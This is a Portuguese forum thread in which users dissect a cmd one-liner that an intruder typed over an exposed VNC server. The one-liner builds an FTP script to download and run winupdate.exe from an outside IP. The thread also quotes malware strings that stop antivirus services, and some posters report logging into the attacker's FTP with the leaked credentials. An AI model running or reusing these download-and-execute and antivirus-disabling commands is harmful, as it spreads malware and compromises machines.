VNC Server, invasão

Bom dia,

Meu ip externo em casa ficou aberto e um espertinho entrou em meu VNC Server - e logo no executar do windows ele digitou:

cmd /c echo open 208.113.163.41 21 >> ik &echo user celltronicacombr celltronicacombr >> ik &echo binary >> ik &echo get /Maildir/tmp/winupdate.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &winupdate.exe&exit

Logo após isso, entrou no arquivos de programas e… fechei a sua conexão.

Alguem sabe o que ele gostaria de fazer com este comando ? abrir um Ftp para copiar dados?

Att.

Caramba, que furo de segurança aí em casa.
Por isso que uso meu próprio programa de acesso remoto o Satan-AnyWhere.
Pelo que deu para mim entender, ele deve ter trocado (ou pelo menos tentado trocar) seu arquivo “winupdate.exe” por um arquivo “winupdate.exe” baixado por FTP de algum lugar (pode ser de algum lugar de controle dele), legal esse carinha não?
Se bem que pode ser até bot de VNC…

Inté.

repara aki:

ik &echo bye >>

e aki:

&del ik &winupdate.exe&exit

Poisé, que cara legal né!

Olhando novamente o comando poderia ser isso.

Verifica-lo ei! :shock:

Ele fez um ftp e a seguir executou o comando malicioso “winupdate.exe”, que obviamente não faz um update do Windows e sim deve fazer alguma m*** %%((*&&&.
Use a técnica Bill Gates de lidar com problemas de segurança - format + reinstall, e depois a técnica que deixa sua máquina mais segura possível: deixe a máquina fora de qualquer rede.
Ou então rode o seu melhor anti-vírus, anti-spyware etc. e veja se não houve alguma contaminação conhecida.

[quote=Michel_Sancovich]repara aki:

ik &echo bye >>

e aki:

&del ik &winupdate.exe&exit
[/quote]

O “bye” seria enviado via pipes para a entrada padrao do programa de ftp que vem junto com o windows.
O “del” estaria detonando algum arquivo.
O “exit” sairia do console.
O “&” no caso do windows pelo menos se não me engano serve para encadear comandos.
O “>>” faz o pipe.
O “ik” por enquanto não sei bem o que faz.

Inté.

Se ele executou os comandos, cuidado com suas senhas de email, banco etc.

O arquivo “ik” só está no script porque o fulano de tal que escreveu o script não conhece o “nul” (também conhecido como “lata de lixo de bits”).
Você viu que o carinha criou um arquivo “ik” só para não mostrar nada na tela, e depois o apagou.

No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é…

[]'s

[quote=AUser]No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é…

[]'s[/quote]
Você conseguiu entrar no FTP do cara? depois me da um retorno do que conseguir! Peguei o tracert do espertinho…

Bó, por essa eu não esperava!
Obrigado pela explicação de todos…

Isso me lembrou de um episódio onde eu estudo, lá usam tudo windows. Colocaram logins para os alunos, com poucas permissões… não dá pra instalar aplicativos ou modificar qualquer coisa do sistema, mas os virus e worms têm acesso garantido, transitam livremente.

[quote=Matheus Leandro Ferreira][quote=AUser]No FTP do carinha tem até umas coisas.

Tô baixando um arquivo aqui de 16mb p/ ver o que é…

[]'s[/quote]
Você conseguiu entrar no FTP do cara? depois me da um retorno do que conseguir! Peguei o tracert do espertinho…

Bó, por essa eu não esperava!
Obrigado pela explicação de todos…

[/quote]

No comando que ele digitou, tem o usuario e senha: celltronicacombr

… Veja bem: a maquina não é dele, e sim de uma empresa que ele conseguiu acesso! dessa celltronica aí.
Eu recomendo que não entrem. Vacilo seu de colocar isso publico aqui.

Perceba que ele colocou no diretorio tmp, que deve dar permissoes para ele colocar arquivos lá.
Provavelmente ele não é root na maquina, apenas pegou o ftp (que usuario e senha ridiculos, convenhamos) ou conseguiu shell.

O suposto arquivo “do mal” winupdate.exe está em maildir/tmp , o resto deve ser coisa da empresa

Falou

Oi,

Maninho!! como você deixou isso acontecer… roda um antivirus e tire o cabo de rede. diz pro pai e pra mãe não entrarem nos e-mails etc…

Analisei o comando, olhe bem:

cmd => abriu o prompt /c => posicionou-se na raiz echo open 208.113.163.41 21 >> ik => criou um arquivo com o nome de ?ik? e começou a incluir comandos (open ...) & => + echo user celltronicacombr celltronicacombr >> ik & => + echo binary >> ik & => + echo get /Maildir/tmp/winupdate.exe >> ik & => + echo bye >> ik => terminou o arquivo ?ik? com os comandos acima... & => + ftp -n -v -s:ik => abriu o ftp e rodou o arquivo ik criado acima (open ? conecta, user e senha, no modo ninário, buscou o winupdate.exe) & => + del ik => excluiu o arquivo ?ik? & => + winupdate.exe => excutou o winupdate.exe & => + exit => fechou o prompt

Relembrando o tempo ms-dos

Entrei no FTP também e baixei esse arquivo, o mesmo foi detectado como virus!

Tchauzin! fica bem =*

acabei de baixar esse arquivo no ubuntu e rodei um strings nele.

uma hora ele conecta no ‘updatemicrosoft.no-ip.info’, aparentemente

E tem esse trecho:

220 Hello! Starting FTPD handling thread. H1d3WoRK update.exe #btnet godofwar #btlog #bttrans #btinfcha #btkill root 1234 root 1234 filepatch exename.exe remove download uizh2984 *@CYBER-TERROR.COM godofwar updatemicrosoft.no-ip.info [DEBUG] Extracting resource, extract_resource()... [DEBUG] Checking if file exists, file_exists()...

Sem falar no temivel

net stop "AntiVir PersonalEdition Classic Guard" &net stop "Security Center" &net stop "Symantec AntiVirus" &net stop "Norton AntiVirus Server" &net stop navapsvc &net stop kavsvc &net stop McAfeeFramework &net stop NOD32krn &net stop McShield &echo open %s %d > i&echo user %s %s >> i &echo get %s >> i &echo bye >> i &ftp -n -v -s:i &del i &%s &exit

Tem uma lista de palavras q parecem ser senhas comuns (como texas, Texas, kool, 123) e uma lista de programas .exe comuns como notepad.exe – enfim é coisa do capeta.

Humm… parece que o virus ja foi removido :twisted:

Galera, de vez em quando deixo meu pc ligado e o vnc server tb, pq as vezes preciso acessar minha maquina de outros lugares…

porem hj fui no menu > iniciar > executar e tinha esse comando:

cmd /c echo open 201.120.57.137 21 >> ik &echo user oracle oracle >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

sei que terei que formata e pc, o pc ja tava precisando, mas serve pra gente ver que proteção nunca é d+, anti virus ativado, firewall, senha no pc, e msm assim parece q passar por isso foi mamão com açucar…